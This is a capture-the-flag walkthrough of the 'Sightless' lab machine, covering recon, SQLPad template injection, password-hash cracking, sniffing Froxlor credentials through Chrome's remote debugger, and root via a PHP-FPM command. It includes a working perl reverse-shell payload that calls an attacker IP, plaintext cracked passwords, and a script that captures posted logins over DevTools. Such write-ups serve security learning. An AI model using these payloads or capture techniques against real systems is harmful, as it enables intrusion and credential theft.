Linux - Easy - Sightless

Recon

└──╼ $nmap -p- -A 10.129.160.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 14:59 UTC
Nmap scan report for 10.129.160.92
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.160.92]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/11%Time=66E1B055%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A2,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.129\.160\.92\]\r\n500\x20Invalid\x20command:\x
SF:20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds

Dirsearch finds nothing of value, and gobuster finds no subdomains either.

Main site

Walking around the site we find a SQLPad instance.

We can learn its version too.

Sure enough, there is a CVE for it (it's an easy box after all):

CVE-2022-0944

All of it is described here:
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

TLDR: start a listener on port 4444 and add a new connection with driver MySQL and the following as the database name (10.10.10.10 stands for the attacker's IP). SQLPad passes connection fields through a {{ }} template that is evaluated server-side in Node, so process.mainModule.require('child_process') gives command execution:

{{ process.mainModule.require('child_process').exec('perl -e \'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'') }}

Nice name.
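To make the bug class concrete, here is an added example (mine, not SQLPad's code and not taken from the huntr report) of a Node template renderer that evaluates whatever sits between {{ }} with new Function, next to a version that only substitutes named context keys. The renderer shape is an assumption for the demo; what it shows is why a form field that reaches such a template hands the server's process object, and from there child_process, to whoever fills in the form.

```javascript
// Added example: the template-injection bug class behind CVE-2022-0944.
// Not SQLPad's code; the renderer shape is an assumption for the demo.

const TEMPLATE_RE = /\{\{\s*([\s\S]+?)\s*\}\}/g;

// Vulnerable renderer: the text between {{ }} is compiled with new Function
// and run inside the server process. The writeup's payload would arrive here
// as expr = "process.mainModule.require('child_process').exec(...)".
function renderUnsafe(template, ctx) {
  return template.replace(TEMPLATE_RE, (_match, expr) => {
    const fn = new Function('ctx', 'with (ctx) { return (' + expr + '); }');
    return String(fn(ctx));
  });
}

// Hardened renderer: {{ name }} must be a bare identifier that exists in the
// context. Operators, property access and calls are refused, never evaluated.
function renderSafe(template, ctx) {
  return template.replace(TEMPLATE_RE, (_match, expr) => {
    if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(expr)) {
      throw new Error('refusing to evaluate template expression: ' + expr);
    }
    if (!Object.prototype.hasOwnProperty.call(ctx, expr)) {
      throw new Error('unknown template variable: ' + expr);
    }
    return String(ctx[expr]);
  });
}

// Constructed "connection" objects standing in for the SQLPad form input.
// The probe reads process.versions.node instead of spawning a shell; if it
// comes back rendered, the same path reaches child_process.
const benign = { driver: 'mysql', database: '{{ dbname }}' };
const probe  = { driver: 'mysql', database: '{{ process.versions.node }}' };
const ctx    = { dbname: 'sqlpad' };

function demo() {
  const out = { unsafe: {}, safe: {} };
  out.unsafe.benign = renderUnsafe(benign.database, ctx);
  out.unsafe.probe  = renderUnsafe(probe.database, ctx); // rendered: injection works
  out.safe.benign   = renderSafe(benign.database, ctx);
  try {
    renderSafe(probe.database, ctx);
    out.safe.probe = 'evaluated (BAD)';
  } catch (e) {
    out.safe.probe = 'rejected: ' + e.message;
  }
  return out;
}

console.log(demo());
```

The hardened version is deliberately strict: rather than trying to sandbox expressions, it only allows a lookup of a known key, which is all a connection form ever needs.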

We are in. The standard shell stabilisation with python3 -c 'import pty;pty.spawn("/bin/bash")' fails with python3: not found (script -qc /bin/bash /dev/null is the usual fallback when no Python is available). whoami returns "root", yet there is no flag in sight, so we are probably in a container.

Running linenum.sh confirms our fears.

It also shows an additional entry in the /etc/shadow file. Probably the SSH password.

michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

Running john gets us:
blindside (root)
insaneclownposse (michael)

We are in via ssh, as predicted.

Priv esc

Running linenum again.

In /etc/cron.daily we can see:

lrwxrwxrwx 1 root root 37 May 14 22:24 google-chrome -> /opt/google/chrome/cron/google-chrome

michael@sightless:/opt/google/chrome$ google-chrome --version
Google Chrome 125.0.6422.60 

Once again there is a CVE for this Chrome version:

https://buptsb.github.io/blog/post/CVE-2024-4947- v8 incorrect AccessInfo for module namespace object causes Maglev type confusion.html

Reading further through the linenum output, we find more about john (a user with higher privileges) and Chrome:

john        1647  0.0  0.6  33660 24580 ?        S    14:51   0:04 /usr/bin/python3 /home/john/automation/administration.py
john        1648  0.3  0.3 33630172 15408 ?      Sl   14:51   0:31 /home/john/automation/chromedriver --port=40373
john        1653  0.0  0.0      0     0 ?        Z    14:51   0:00 [chromedriver] <defunct>
john        1659  0.6  2.8 34003124 114052 ?     Sl   14:51   0:52 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.5cgJoJ data:,
john        1661  0.0  0.0 33575860 3044 ?       Sl   14:51   0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john        1665  0.0  1.4 34112452 56388 ?      S    14:51   0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1661 --enable-crash-reporter
john        1666  0.0  1.4 34112456 56896 ?      S    14:51   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1661 --enable-crash-reporter
john        1681  0.3  3.0 34362348 119676 ?     Sl   14:51   0:31 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1661 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john        1682  0.1  2.1 33900068 86384 ?      Sl   14:51   0:11 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1661 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,15292266550865892519,2896309854822872465,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john        1710  3.0  4.5 1186799476 178872 ?   Sl   14:51   4:06 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1661 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1726066167952305 --launc

We learn that Chrome is running headless, driven by chromedriver (listening on port 40373) from /home/john/automation/administration.py. Note the --remote-debugging-port=0 on the Chrome process: Chrome picks a random port for its DevTools endpoint, so 40373 is chromedriver's WebDriver port, not the DevTools port.

Running pspy we can also see that every 60 seconds /bin/bash /home/john/automation/healthcheck.sh is executed.

The CVE-2024-4947 PoC needs the d8 shell, which is not available on the box. After a bit of stumbling I decided to connect to chromedriver from a browser instead.

Found this dev.to guide.

ssh -L 40373:127.0.0.1:40373 michael@10.129.160.92
/usr/bin/google-chrome --remote-debugging-port=40373
chrome://inspect/#devices

…and it doesn't work: 40373 is chromedriver's WebDriver endpoint, which speaks a different protocol from the DevTools socket that chrome://inspect expects.

michael@sightless:~$ ss -tulpn
Netid           State            Recv-Q           Send-Q                       Local Address:Port                        Peer Address:Port           
udp             UNCONN           0                0                            127.0.0.53%lo:53                               0.0.0.0:*                              
udp             UNCONN           0                0                                  0.0.0.0:68                               0.0.0.0:*                              
tcp             LISTEN           0                4096                             127.0.0.1:3000                             0.0.0.0:*                              
tcp             LISTEN           0                4096                         127.0.0.53%lo:53                               0.0.0.0:*                              
tcp             LISTEN           0                70                               127.0.0.1:33060                            0.0.0.0:*                              
tcp             LISTEN           0                4096                             127.0.0.1:40517                            0.0.0.0:*                              
tcp             LISTEN           0                10                               127.0.0.1:34763                            0.0.0.0:*                              
tcp             LISTEN           0                128                                0.0.0.0:22                               0.0.0.0:*                              
tcp             LISTEN           0                511                              127.0.0.1:8080                             0.0.0.0:*                              
tcp             LISTEN           0                511                                0.0.0.0:80                               0.0.0.0:*                              
tcp             LISTEN           0                151                              127.0.0.1:3306                             0.0.0.0:*                              
tcp             LISTEN           0                5                                127.0.0.1:40373                            0.0.0.0:*                              
tcp             LISTEN           0                128                                      *:21                                     *:*                              
tcp             LISTEN           0                128                                   [::]:22                                  [::]:*                              

So tunneling via ssh again, ssh -L 8080:127.0.0.1:8080 michael@10.129.160.92, gets us:

It's the Froxlor we could have read about on the main site.

After seeing the domain error, I changed the address from localhost:8080 to 127.0.0.1:8080 and was greeted with a nice login page.

Our username and password don't work here, though. There was no direct exploit, so I went back to exploring ports.

ssh -L 33060:127.0.0.1:33060 \
    -L 40517:127.0.0.1:40517 \
    -L 34763:127.0.0.1:34763 \
    -L 3306:127.0.0.1:3306 \
    -L 40373:127.0.0.1:40373 \
    michael@10.129.160.92

Adding the forwarded ports to the remote debugger again, 127.0.0.1:34763 works. That is the port Chrome chose for --remote-debugging-port=0. Two quicker checks than trying each listener: Chrome writes the chosen port to the DevToolsActivePort file under its user data dir (here /tmp/.org.chromium.Chromium.5cgJoJ) if that is readable, and a DevTools port answers curl http://127.0.0.1:PORT/json/version with a JSON document, which chromedriver's WebDriver port does not.

Upon clicking inspect, we can see some magic going on. First we see the Froxlor page.

Then we see the password being typed automatically, probably by the healthcheck.sh script. We then see the dashboard, and finally we are logged out.

We can press ctrl+e in the Network panel to record all of the traffic in the inspector, and press it again to stop after a full cycle. We can then inspect all of the requests in peace. In the POST to index.php we find the username Admin and the password ForlorfroxAdmin.

Going back to port 8080, we can log in.
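The same capture, done by script instead of by clicking in chrome://inspect, as an added example (mine, not from this writeup, Chrome or Froxlor). It also covers the port-hunting step above. The DevToolsActivePort file layout and the /json target list are standard Chrome behaviour; the target list, the CDP events and the Froxlor field names loginname/password are constructed samples so the block runs offline, and the live-capture function assumes a WebSocket client (Node 22+ global, or the ws package) and is not executed here.

```javascript
// Added example, not part of the original writeup. Standard Chrome behaviour
// is used for the port file and /json listing; all sample data is constructed.

// 1. Chrome started with --remote-debugging-port=0 records the port it picked
//    in <user-data-dir>/DevToolsActivePort: first line the port, second line
//    the browser target path.
function parseDevToolsActivePort(text) {
  const [port, browserPath] = text.trim().split('\n');
  const n = Number(port);
  if (!Number.isInteger(n) || n <= 0 || n > 65535) {
    throw new Error('unexpected DevToolsActivePort contents');
  }
  return { port: n, wsUrl: 'ws://127.0.0.1:' + n + browserPath };
}

// 2. GET http://127.0.0.1:<port>/json lists targets; pages carry a
//    webSocketDebuggerUrl to attach to. chromedriver's WebDriver port does
//    not serve this listing, which is why the writeup's 40373 attempt failed.
function pageDebuggerUrls(targetsJson) {
  return JSON.parse(targetsJson)
    .filter((t) => t.type === 'page' && t.webSocketDebuggerUrl)
    .map((t) => ({ url: t.url, ws: t.webSocketDebuggerUrl }));
}

// 3. After Network.enable on a page session, every request surfaces as a
//    Network.requestWillBeSent event; form logins show up as POST bodies.
//    Credential-looking keys are picked out of the urlencoded body.
function extractPostCredentials(events) {
  const found = [];
  for (const ev of events) {
    if (ev.method !== 'Network.requestWillBeSent') continue;
    const req = ev.params.request;
    if (req.method !== 'POST' || !req.postData) continue;
    const fields = Object.fromEntries(new URLSearchParams(req.postData));
    if (Object.keys(fields).some((k) => /pass|pwd|secret/i.test(k))) {
      found.push({ url: req.url, fields });
    }
  }
  return found;
}

// Live version (assumption: a WebSocket client is available; not run here).
// Attaches to one page target, enables Network events, listens for a while
// and returns whatever credentials were posted in that window.
async function captureLogin(pageWsUrl, millis) {
  const ws = new WebSocket(pageWsUrl);
  const events = [];
  ws.addEventListener('message', (m) => events.push(JSON.parse(m.data)));
  await new Promise((resolve) => ws.addEventListener('open', resolve));
  ws.send(JSON.stringify({ id: 1, method: 'Network.enable' }));
  await new Promise((resolve) => setTimeout(resolve, millis));
  ws.close();
  return extractPostCredentials(events);
}

// Constructed samples standing in for the live box.
const SAMPLE_ACTIVE_PORT = '34763\n/devtools/browser/0f1d0c2e-0000-4000-8000-123456789abc\n';
const SAMPLE_TARGETS = JSON.stringify([
  { type: 'page', url: 'http://127.0.0.1:8080/index.php',
    webSocketDebuggerUrl: 'ws://127.0.0.1:34763/devtools/page/PAGE1' },
  { type: 'background_page', url: 'chrome-extension://abc/bg.html',
    webSocketDebuggerUrl: 'ws://127.0.0.1:34763/devtools/page/PAGE2' },
]);
const SAMPLE_EVENTS = [
  { method: 'Network.requestWillBeSent',
    params: { request: { url: 'http://127.0.0.1:8080/index.php', method: 'GET' } } },
  { method: 'Network.requestWillBeSent',
    params: { request: { url: 'http://127.0.0.1:8080/index.php', method: 'POST',
      postData: 'loginname=admin&password=ForlorfroxAdmin&dologin=' } } },
];

function demoCapture() {
  return {
    active: parseDevToolsActivePort(SAMPLE_ACTIVE_PORT),
    pages: pageDebuggerUrls(SAMPLE_TARGETS),
    creds: extractPostCredentials(SAMPLE_EVENTS),
  };
}

console.log(JSON.stringify(demoCapture(), null, 2));
```

Against the live box, parseDevToolsActivePort would be fed the contents of the DevToolsActivePort file (if readable), pageDebuggerUrls the body of the forwarded /json endpoint, and captureLogin a page URL from that list, left running for at least one 60-second healthcheck cycle.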

I've tinkered for way too long with adding a PHP reverse shell to the site and then executing it. I tried creating more subdomains too, but none of it worked. I ended up abusing the PHP-FPM restart command.

I also tried a netcat reverse shell, but the -e parameter is blocked. I tried a bash reverse shell as well, but the use of special chars like "&" and ">" is blocked. That is why I ended up putting it in a file. Then going to Settings >> PHP-FPM allows us to restart it, by toggling the switch off and on.

After waiting for a while, I got a shell with root access. It is necessary to wait after each try, as the command is executed every 5 min by a cron job.

Cool box.